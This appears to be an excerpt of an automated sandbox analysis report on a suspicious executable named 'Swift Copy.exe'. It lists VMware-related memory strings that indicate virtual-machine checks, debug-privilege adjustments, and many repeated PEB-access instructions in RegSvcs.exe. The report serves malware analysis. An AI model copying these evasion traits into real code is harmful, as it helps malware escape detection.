Source: explorer.exe, 0000000B.00000000.380692577.0000000000680000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 0000000B.00000000.334568953.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
Source: explorer.exe, 0000000B.00000000.300110801.00000000062C4000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+]e
Source: explorer.exe, 0000000B.00000000.320221705.0000000004287000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
Source: explorer.exe, 0000000B.00000000.327235591.000000000820E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000000B.00000000.341791514.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000B.00000000.342989773.0000000008223000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD00l
Source: Swift Copy.exe, 00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F6B90 rdtsc 8_2_018F6B90
Source: C:\Users\user\Desktop\Swift Copy.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FA185 mov eax, dword ptr fs:[00000030h] 8_2_018FA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EC182 mov eax, dword ptr fs:[00000030h] 8_2_018EC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2990 mov eax, dword ptr fs:[00000030h] 8_2_018F2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019451BE mov eax, dword ptr fs:[00000030h] 8_2_019451BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h] 8_2_018F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F61A0 mov eax, dword ptr fs:[00000030h] 8_2_018F61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov ecx, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E99BF mov eax, dword ptr fs:[00000030h] 8_2_018E99BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019469A6 mov eax, dword ptr fs:[00000030h] 8_2_019469A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019849A4 mov eax, dword ptr fs:[00000030h] 8_2_019849A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h] 8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h] 8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB1E1 mov eax, dword ptr fs:[00000030h] 8_2_018CB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019541E8 mov eax, dword ptr fs:[00000030h] 8_2_019541E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h] 8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h] 8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9100 mov eax, dword ptr fs:[00000030h] 8_2_018C9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov eax, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E4120 mov ecx, dword ptr fs:[00000030h] 8_2_018E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F513A mov eax, dword ptr fs:[00000030h] 8_2_018F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F513A mov eax, dword ptr fs:[00000030h] 8_2_018F513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h] 8_2_018EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB944 mov eax, dword ptr fs:[00000030h] 8_2_018EB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CC962 mov eax, dword ptr fs:[00000030h] 8_2_018CC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h] 8_2_018CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CB171 mov eax, dword ptr fs:[00000030h] 8_2_018CB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C9080 mov eax, dword ptr fs:[00000030h] 8_2_018C9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01943884 mov eax, dword ptr fs:[00000030h] 8_2_01943884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01943884 mov eax, dword ptr fs:[00000030h] 8_2_01943884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F20A0 mov eax, dword ptr fs:[00000030h] 8_2_018F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov ecx, dword ptr fs:[00000030h] 8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h] 8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FF0BF mov eax, dword ptr fs:[00000030h] 8_2_018FF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019090AF mov eax, dword ptr fs:[00000030h] 8_2_019090AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov ecx, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0195B8D0 mov eax, dword ptr fs:[00000030h] 8_2_0195B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C58EC mov eax, dword ptr fs:[00000030h] 8_2_018C58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h] 8_2_018EB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EB8E4 mov eax, dword ptr fs:[00000030h] 8_2_018EB8E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h] 8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h] 8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C40E1 mov eax, dword ptr fs:[00000030h] 8_2_018C40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h] 8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h] 8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01947016 mov eax, dword ptr fs:[00000030h] 8_2_01947016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01994015 mov eax, dword ptr fs:[00000030h] 8_2_01994015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01994015 mov eax, dword ptr fs:[00000030h] 8_2_01994015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F002D mov eax, dword ptr fs:[00000030h] 8_2_018F002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DB02A mov eax, dword ptr fs:[00000030h] 8_2_018DB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA830 mov eax, dword ptr fs:[00000030h] 8_2_018EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h] 8_2_018E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E0050 mov eax, dword ptr fs:[00000030h] 8_2_018E0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01982073 mov eax, dword ptr fs:[00000030h] 8_2_01982073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01991074 mov eax, dword ptr fs:[00000030h] 8_2_01991074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h] 8_2_018D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D1B8F mov eax, dword ptr fs:[00000030h] 8_2_018D1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198138A mov eax, dword ptr fs:[00000030h] 8_2_0198138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0197D380 mov ecx, dword ptr fs:[00000030h] 8_2_0197D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2397 mov eax, dword ptr fs:[00000030h] 8_2_018F2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FB390 mov eax, dword ptr fs:[00000030h] 8_2_018FB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h] 8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h] 8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F4BAD mov eax, dword ptr fs:[00000030h] 8_2_018F4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01995BA5 mov eax, dword ptr fs:[00000030h] 8_2_01995BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019453CA mov eax, dword ptr fs:[00000030h] 8_2_019453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_019453CA mov eax, dword ptr fs:[00000030h] 8_2_019453CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EDBE9 mov eax, dword ptr fs:[00000030h] 8_2_018EDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F03E2 mov eax, dword ptr fs:[00000030h] 8_2_018F03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198131B mov eax, dword ptr fs:[00000030h] 8_2_0198131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01998B58 mov eax, dword ptr fs:[00000030h] 8_2_01998B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CDB40 mov eax, dword ptr fs:[00000030h] 8_2_018CDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CF358 mov eax, dword ptr fs:[00000030h] 8_2_018CF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CDB60 mov ecx, dword ptr fs:[00000030h] 8_2_018CDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h] 8_2_018F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F3B7A mov eax, dword ptr fs:[00000030h] 8_2_018F3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h] 8_2_018FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FD294 mov eax, dword ptr fs:[00000030h] 8_2_018FD294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C52A5 mov eax, dword ptr fs:[00000030h] 8_2_018C52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h] 8_2_018DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018DAAB0 mov eax, dword ptr fs:[00000030h] 8_2_018DAAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018FFAB0 mov eax, dword ptr fs:[00000030h] 8_2_018FFAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2ACB mov eax, dword ptr fs:[00000030h] 8_2_018F2ACB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018F2AE4 mov eax, dword ptr fs:[00000030h] 8_2_018F2AE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018D8A0A mov eax, dword ptr fs:[00000030h] 8_2_018D8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h] 8_2_0198AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_0198AA16 mov eax, dword ptr fs:[00000030h] 8_2_0198AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018E3A1C mov eax, dword ptr fs:[00000030h] 8_2_018E3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h] 8_2_018CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018CAA16 mov eax, dword ptr fs:[00000030h] 8_2_018CAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov ecx, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018C5210 mov eax, dword ptr fs:[00000030h] 8_2_018C5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_018EA229 mov eax, dword ptr fs:[00000030h] 8_2_018EA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 8_2_01904A2C mov eax, dword ptr fs:[00000030h] 8_2_01904A2C
